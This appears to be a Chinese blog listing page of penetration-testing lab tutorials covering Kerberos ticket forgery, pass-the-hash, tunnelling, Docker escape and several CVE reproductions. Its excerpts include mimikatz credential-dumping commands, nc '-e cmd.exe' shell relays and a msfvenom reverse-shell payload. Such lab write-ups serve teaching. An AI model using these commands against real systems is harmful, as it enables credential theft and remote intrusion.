自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(33)
  • 资源 (2)
  • 收藏
  • 关注

原创 白票据获取域控权限

白票据获取域控权限(1)登陆域控获取域控的sid和ntlmmimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt在password.txt中找到Sid S-1-5-21-2189589203-2536092258-2850724310(去掉500) Ntlm 2ef416694b4ad072611e63de65c5dd38(dc$的ntlm,不是administrator)(2)登陆域成员win7打

2021-06-30 22:11:09 224

原创 利用黄金票据获取域控权限

利用黄金票据获取域控权限(1)在域控服务器上用mimikatz获取krbtgt的sid和ntlm提权执行命令:privilege::debug获取用户krbtgt的信息执行命令lsadump::dcsync /domain:demo.com /user:krbtgt(2)获取krbtgt的sid和ntlm(这里尤其注意要去掉502)sid S-1-5-21-2189589203-2536092258-2850724310-502 ntlm c68811b401358f8d153cdb752e2

2021-06-30 22:08:24 464

原创 使用mimikatz利用哈希传递获取域控权限

使用mimikatz利用哈希传递获取域控权限靶机 window server 2012 IP 192.168.1.22攻击机 window7 IP 192.168.1.34(1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7使用pwdump7,执行命令Pwdump7.exe导出信息到1.txt中复制出ntlmCE28B42F9943D0552385BC5F6338F9B9(2)在

2021-06-29 20:41:44 992

原创 Nc内网穿透

Nc内网穿透攻击机 ip 192.168.32.122执行nc -lvp 3333目标机 ip 192.168.1.5执行nc -lvp 3333 -e c:\windows\system32\cmd.exe中间机 ip 192.168.32.128 192.168.1.3执行 nc -v 192.168.32.122 3333 -e “nc -v 192.168.1.5 3333”在攻击机查看结果,已经拿到了目标机的shell...

2021-06-10 20:36:59 459

原创 Lcx内网端口转发

Lcx内网端口转发攻击机window7 ip 192.168.1.5靶机 windowXP ip 192.168.1.6(1)在攻击机监听的2222端口的流量转发到3333端口上执行命令lcx.exe –listen 2222 3333(2)在靶机上执行端口转发192.168.1.6为本机IP,2222为转发端口,127.0.0.1为靶机内网IP,3333为远程终端端口执行命令:lcx -slave 192.168.1.6 2222 127.0.0.1 3333(3)在攻击机上查看成功监听

2021-06-10 20:34:33 303

原创 利用EW代理实现内网穿透

利用EW代理实现内网穿透环境:攻击机:kali ip192.168.32.132中间机:win7 ip 192.168.32.128 ip2 192.168.1.3 假定为公网vps内网主机:win32 192.168.1.4 被攻占主机内网测试机:winxp 192.168.1.5 内网扫描机配置:中间机执行ew_win32.exe -s rcsocks -l 1080 -e 8888被攻占主机执行ew_win32.exe -s rssocks -d 192.168.1.3 -e

2021-06-10 20:16:01 714

原创 利用SSH实现内网穿透

利用SSH实现内网穿透A机器 kali ip 192.168.32.132B机器 ubantu16.4 ip 192.168.32.135 192.168.1.5C机器 ubantu 16.4 ip 192.168.1.6使用隧道让A访问C(1)配置环境配置IP地址(2)安装ssh服务执行命令:apt install -y openssh-server三台虚拟机都需要安装ssh服务开启ssh服务,执行命令service ssh start(3)修改B和C的配置远程root登录执

2021-06-10 20:10:01 1209

原创 搭建域控内网环境

搭建域控内网环境(一)安装AD(1)安装VMware window2012操作系统,更改2012计算机名为DC,修改IP地址为192.168.1.1选择配置此本地服务器更改计算机名配置IP地址(2)添加角色和功能,选择AD域服务和DNS服务(3)配置AD,选择AD DS->为此服务器提示为域控制器->部署配置->添加新林->根域名为“demo.com”(4)设置进入系统安全模式,修复AD数据库密码zksec@2017(5)先决条件失败,设置系统密码zks

2021-06-10 20:05:55 388

原创 使用SET工具获取登陆用户名、密码

使用SET工具获取登陆用户名、密码实验环境:kali IP地址:192.168.32.132Set工具介绍:开源的社会工程学利用套件,通常结合 metasploit 来使用。Social-Engineer Toolkit 专门用于社会工程的高级攻击包 。SET由David Kennedy(ReL1K)编写,并在社区人员的大量帮助下,它包含了以前从未见过的攻击工具集。渗透测试期间,工具包中内置的攻击工具可以进行有针对性地集中攻击。SET 的主要目的是自动化并改进社会工程学攻击。它能够自动生成隐藏了EX

2021-05-20 15:42:14 391

原创 复现利用特权模式docker逃逸

复现利用特权模式docker逃逸漏洞说明:获取某个系统shell后发现其是docker,这时候我们就需要进行docker逃逸来拿到其真正宿主的权限,利用特权模式逃逸靶机:ubantu16.0 IP地址 192.168.32.142Docker version 小于 18.09.2版本当管理员执行docker run -privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。(1)下载centos镜像执行命令:docker pull cento

2021-05-17 17:50:57 1553

原创 cms复现

cms复现漏洞利用备份数据访问localhost/EmpireCMS_7.5/EmpireCMS_7.5_SC_UTF8/upload/e/install/index.php进行下载安装安装完登录localhost/EmpireCMS_7.5/EmpireCMS_7.5_SC_UTF8/upload/e/admin/admin.php找到 系统=》备份与恢复数据=》备份数据在备份文件中随意选择一项,打开代理,点击开始备份进行抓包备份数据传送的参数如下tablename数据改为phpin

2021-05-14 07:56:04 184

原创 复现Apache Shiro 1.2.4反序列化漏洞

复现Apache Shiro 1.2.4反序列化漏洞漏洞原理:Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命

2021-05-14 07:46:47 358

原创 复现Fastjson 1.2.47 远程命令执行漏洞

复现Fastjson 1.2.47 远程命令执行漏洞漏洞原理:Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。攻击机:window 10 IP地址192.168.32.1靶机:ubantu 16.04 IP地址192.168.32.142攻击步骤:(1)开启Fastjson

2021-05-14 07:41:03 1194 2

原创 Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 )

Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 )漏洞原理:Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞攻击机:window 10 192.168.32.1靶机:ubantu 16.04 192.168.32.142(1)在ubantu中开启docker环境CVE-2017-8291执行命令:docker-compose up

2021-05-14 07:29:43 896 1

原创 复现ssh用户名枚举漏洞

复现ssh用户名枚举漏洞利用ssh-check-username.py脚本确认用户是否是正确的(1)在kali中安装python2,把ssh-check-username.py 脚本拖到kali中#!/usr/bin/env python# Copyright (c) 2018 Matthew Daley## Permission is hereby granted, free of charge, to any person obtaining a copy# of this softwa

2021-05-09 10:03:50 988 2

原创 telnet爆破

telnet爆破利用msf中的telnet_login模块对metasploitable的ssh服务实施爆破攻击在kali里启动msf使用search查询telent_login模块,然后使用use调用该模块设置连接metasploitable的ip地址,使用set rhosts ip地址设置用户名和密码文件Run实行爆破...

2021-05-09 09:50:50 276

原创 ssh漏洞

ssh漏洞利用msf中的ssh_login模块对metasploitable的ssh服务实施爆破攻击在kali里启动msf使用search查询ftp_login模块,然后使用use调用该模块设置连接metasploitable的ip地址,使用set rhosts ip地址设置用户名和密码文件Run实行爆破...

2021-05-09 09:48:58 2086

原创 Vsftpd后门

Vsftpd后门打开msf,使用search查找vsftpd模块,使用use调用该模块连接metasploitable的ip地址,使用set rhost IP地址使用run执行,生成shell

2021-05-09 09:47:35 674

原创 利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell

利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell在ubuntu中找到vulhub靶场Samba中的CVE-2017-7494运行测试环境:docker-compose up -d攻击机kali打开msf服务使用漏洞2017-7494模块配置目标机IP地址192.168.32.142执行run命令获取shell测试权限...

2021-05-08 12:18:06 523

原创 利用Linux本地内核漏洞(CVE-2019-13272)进行提权

利用Linux本地内核漏洞(CVE-2019-13272)进行提权复现版本Ubuntu16.04下载exp.c脚本地址:https://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/01-CVE-2019-13272.c新建一个用户,设置密码版本小于5.1.17在Ubuntu中编译exp.c文件执行命令:gcc exp.c -o exp运行exp文件...

2021-05-08 12:16:21 206

原创 ms16-016提权

ms16-016提权简介:靶机需32位windows系统攻击机:kali IP地址为:192.168.32.132目标机:windows32 IP地址:192.168.32.135先ping两台主机看是否通步骤:1)生成木马,设置本地ip地址192.168.32.132和端口号4444msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe2)

2021-05-08 12:13:09 1194

原创 Windows-Exploit-Suggester

Windows-Exploit-Suggester1,下载Windows-Exploit-Suggester下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester2,此python脚本用2.x(2.7.9)下载python2.7版本,配置环境变量,右击计算机,选择属性=》高级系统设置=》环境变量=》找到Path=》编辑=》在变量值最后加上;E:\Python27;E:\Python27\Scripts在cmd下查看python

2021-05-08 12:05:42 731

原创 复现Weblogic < 10.3.6 ‘wls-wsat‘XMLDecoder 反序列化漏洞 (CVE-2017-10271)

复现Weblogic < 10.3.6 'wls-wsat’XMLDecoder 反序列化漏洞 (CVE-2017-10271)漏洞原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击机:window10 IP:192.168.32.1靶机:ubantu16.04 IP:192.168.32.142(1)在vulhub靶场中找vulhub/w

2021-05-08 11:57:28 159

原创 复现Tomcat PUT方法任意写文件(CVE-2017-12615)

复现Tomcat PUT方法任意写文件(CVE-2017-12615)漏洞原理:漏洞的产生是由于配置不当(非默认配置),将配置文件(conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法攻击机:window10 IP:192.168.32.1靶机:ubantu16.04 IP:192.168.32.142(1)在vulhub靶场中找vulhub/tomcat/CVE-2017-12615开启

2021-05-08 11:07:02 377

原创 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)

Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)漏洞原理:Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞攻击机:window10 IP:192.168.32.1靶机:ubantu16.04 IP:192.168.32.142(1)在vulhub靶场...

2021-05-08 11:00:15 756

原创 Web框架漏洞--Struts2 漏洞S2-052

Web框架漏洞–Struts2 漏洞S2-052漏洞利用:Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。攻击机:window10 IP:192.168.32.1靶机:ubantu16.04 IP:192.168.32.142(1)使用vulhub靶场,进入到s2-052

2021-05-08 10:49:57 845 2

原创 Web框架漏洞--Struts2 漏洞S2-045

Web框架漏洞–Struts2 漏洞S2-045漏洞原理:在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。攻击机:window10 IP:192.168.32.1靶机:ubantu16.04 IP:192.168.32.142(1)使用vulhub靶场,进入到s2-045漏洞目录下开启s2-045环境执行命令:docker-compose

2021-05-08 10:35:14 1312

原创 cve-2019-0708漏洞复现

cve-2019-0708漏洞复现利用cve-2019-0708造成靶机蓝屏1.利用msf 扫描模块确定是否存在漏洞2.利用msf攻击模块进行攻击注意设置set target 1准备工作:(1)下载 Reference中的攻击套件放置文件到msf的相应文件夹下载地址:https://github.com/rapid7/metasploit-framework/(2)替换相应的msfcve_2019_0708_bluekeep_rce.rb 位于metasploit-framework-ma

2021-04-20 21:58:31 579

原创 RDP shift后门漏洞

RDP shift后门漏洞在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮点击该按钮可以看到有一些信息在信息最下面有个隐私声明的地址打开这个地址会看到是一个记事本文件,在记事本文件中有文件打开功能这样我们就进入看到了主机的所有文件,可以进行一些列的工作这里的D盘实际是主机的C盘此时它会有一个本地的记事本,可以通过它打开TXT文件。打开Windows->System32文件夹 ,在文件

2021-04-20 21:51:58 511

原创 利用redis漏洞反弹shell

利用redis漏洞反弹shell攻击机:kali 192.168.32.132目标机:centos7 192.168.32.144(1)在目标机centos中安装redis服务器(redis-server)解压,进入源码目录,然后编译(make、make install)解压文件:tar -zxvf redis-2.8.17.tar.gz移动解压文件执行命令:mv redis-2.8.17 /usr/local/redis进入到目录下:cd /usr/local/redis执行ma

2021-04-20 21:44:09 2114 2

原创 复现PHPMyAdmin(CVE-2018-12613)漏洞,并利用漏洞实现上传WebShell

复现PHPMyAdmin(CVE-2018-12613)漏洞并利用漏洞实现上传WebShell漏洞描述:  在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者

2021-04-20 21:25:01 613

原创 MySQL UDF提权 UDF添加用户

MySQL UDF提权 UDF添加用户UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。(1)查看secure_file_priv的值show global variables like 'secure%'; 当 secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出,此时无法提权 当 secure_file_pr

2021-04-20 17:19:56 390

原创 kali安装最新版nessus

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar

2021-03-24 09:05:37 1158

jdk1.8和jre1.8版本

java1.8版本对应得jdk和jre

2021-05-14

fastjson_rce_tool-master.zip

个人亲试,好用的脚本文件

2021-05-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除